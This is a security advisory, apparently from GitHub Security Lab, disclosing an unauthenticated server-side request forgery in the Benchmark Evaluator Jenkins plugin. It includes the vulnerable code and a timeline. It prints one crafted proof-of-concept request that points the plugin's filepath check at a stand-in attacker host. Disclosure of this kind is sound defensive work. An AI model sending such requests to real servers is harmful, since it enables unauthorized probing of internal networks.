Coordinated Disclosure Timeline
- 2023-04-11: Issue reported to the Jenkins Security team.
- 2023-07-12: Advisory published (no fix available).
Summary
A Server-Side Request Forgery (SSRF) vulnerability was found in the benchmark-evaluator-plugin. The vulnerability resides in the io.jenkins.plugins.benchmark.BenchmarkBuilder#doCheckFilepath method and can be exploited without authentication. An attacker can leverage this vulnerability to send requests to arbitrary hosts.
Product
Benchmark Evaluator Jenkins plugin
Tested Version
Details
SSRF in io.jenkins.plugins.benchmark.BenchmarkBuilder#doCheckFilepath (GHSL-2023-073)
The doCheckFilepath method in the BenchmarkBuilder.java file lacks proper validation and sanitization of user input for the ctrlUrl parameter, allowing a blind exploitation of a server-side request forgery (SSRF).
Affected source code: BenchmarkBuilder.java
public FormValidation doCheckFilepath(@QueryParameter String filepath) throws IOException, ServletException {
...
for(String end : BenchmarkResults.endings){
if(filepath.toLowerCase().endsWith("."+end)){
ending = end;
}
}
Map<String, Double> m = null;
try {
ReadResult r = new BenchmarkResults(filepath).read();
....
}
...
In order to exploit the vulnerability, an attacker may send the following crafted request:
GET /jenkins/descriptorByName/io.jenkins.plugins.benchmark.BenchmarkBuilder/checkFilepath?filepath=http%3A%2F%2Fattacker.com/%23.csv HTTP/1.1
Host: localhost:8080
Connection: close
This vulnerability was found using CodeQL’s SSRF Java query.
Impact
This issue may lead to server-side request forgery.
CVE
- CVE-2023-37962 (CSRF)
- CVE-2023-37963 (missing permission check)
Resources
Credit
This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2023-073 in any communication regarding this issue.